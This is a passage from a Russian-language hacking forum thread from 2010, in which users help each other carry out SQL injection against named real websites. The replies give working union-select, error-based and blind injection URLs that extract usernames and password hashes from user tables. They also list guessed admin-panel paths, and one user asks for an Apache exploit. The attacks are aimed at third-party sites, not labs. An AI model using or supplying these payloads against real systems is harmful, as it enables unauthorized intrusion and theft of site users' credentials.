Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    401
    Likes Received:
    118
    Reputations:
    23
    /path/to/script?id=
    Code:
    if ($id){
    		#Fields that can be viewed only.
    		$sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, ";
    		$sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, ";
    		$sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date ";
    		$sql .= "FROM table1 p1, table2 p2 WHERE ";
    		$sql .= "p1.id = p2.id AND p1.id = '$id'";  			
    		$result = mysql_query($sql);
    ...
    mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны
     
    #14941 lukmus, 1 Oct 2010
    Last edited: 1 Oct 2010
  2. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    PHP:
    /path/to/script?id=1' or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--

    только подзапросы поддерживаться не будут.
     
    1 person likes this.
  3. karencho777

    karencho777 New Member

    Joined:
    20 Jan 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    люди можете помочь наити експлоит под апаче версии 1.3.36 спасибо
     
  4. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    401
    Likes Received:
    118
    Reputations:
    23
    я не очень понимаю твою мысль, как по твойму будет выглядеть запрос к БД и каким образом это обойдет ковычки?
    по-мойму запрос будет такой:
    Code:
    SELECT bla,bla,bla FROM table1 p1, table2 p2 WHERE p1.id = p2.id AND p1.id = '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'
    и запрос ничего не вернет т.к. нет такого поле, где id равно строке '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'
     
  5. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Верный запрос:
    Code:
    1'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1 -- a 
    
    Но не в этом суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.

    Все поля из таблиц вытащить не удастся. Вытащить можно только те поля, которые участвуют в запросе, так как нельзя использовать объединение запросов через union.

    Все что можно сделать это:
    Code:
    1'+and+ascii(substring(password,1,1))>66 -- a
    
    Code:
    1'+and+substring(password,1,1)='f' -- a
    
    По тому куску кода, что ты выложил, что и как фильтруется сказать нельзя.
     
    #14945 h00lyshit!, 2 Oct 2010
    Last edited: 2 Oct 2010
    1 person likes this.
  6. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    401
    Likes Received:
    118
    Reputations:
    23
    я так не думаю т.к. уже вытащил пол таблицы методом слепой скули а-ля:
    Code:
    id=1+AND+128>ascii(mid(column,1,1))
    фишка в том, как вы понимаете, что вытащить можно хоть все поля всех записей из нужной таблицы, если данный запрос уязвим.
    Здесь вообще речь не об этом, а о том как обойти эти кавычки. Код скрипта обработчика я привел, но каким-то макаром если я подставляю ковычку в
    Code:
    script.php?id=1'
    на странице все равно верный результат т.е. кавычка как-то фильтруется, так вот как она фильтруется и как это обойти?
     
  7. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6,7,8,9,10+from+vbbusers+--+
    чё не так делаю?
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,3,4,5,6,7,8,9,10+from+vbb_users--+


    _ потерял...смотри внимательнее как табла называется

    и с какого перепугу ты колонку тоже неправильно написал? версия 5 , выводи все правильно...

    http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,name,pwd,5,6,7,8,9,10+from+vbb_users--+
     
    #14948 Gorev, 2 Oct 2010
    Last edited: 2 Oct 2010
    2 people like this.
  9. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Тож смотрю на дамп и не вижу такой таблици. Вот если нужно дамп структуры - http://rghost.ru/2790176
     
  10. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    a где там админка форума?)
     
  11. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    Помогите найти админку www.ealandmania.net
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а ты это форумом называешь?
     
  13. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    =)
    всё таки где админка ?
     
  14. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    www.ealandmania.net/admin
    www.ealandmania.net/controlpanel/
    www.ealandmania.net/cpanel/
    www.ealandmania.net/kpanel/
     
  15. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    -PRIVAT-
    tnx
    Помогите докрутить скулю, не могу подобрать кол-во колонок, пробывал ч-з blind не выходит
    http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5%20order%20by%203%20--
     
  16. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Code:
    http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)
    Дальше лимитом перебирай
     
  17. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    ребят нужна помощь, не могу найти админку
    Code:
    http://www.shalomtv.tv
    в ПМ пожалуйста
     
  18. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    помогите найти логины и пароли сайта kitcom.ru
    SQL inj:
    http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,database()
     
  19. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,version()+--+
    В 4.1.21 нету information_schema , значит не получится вывести таблицу с аккаунтами ...
    Как выриант брутить таблицы :)

    http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,concat_ws(0x3a,login,pwd)+from+users+--+

    Подабрал users,accounts - дальше сам пробуй )
     
    #14959 tracy, 2 Oct 2010
    Last edited: 2 Oct 2010
  20. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    спасибо
     
Thread Status:
Not open for further replies.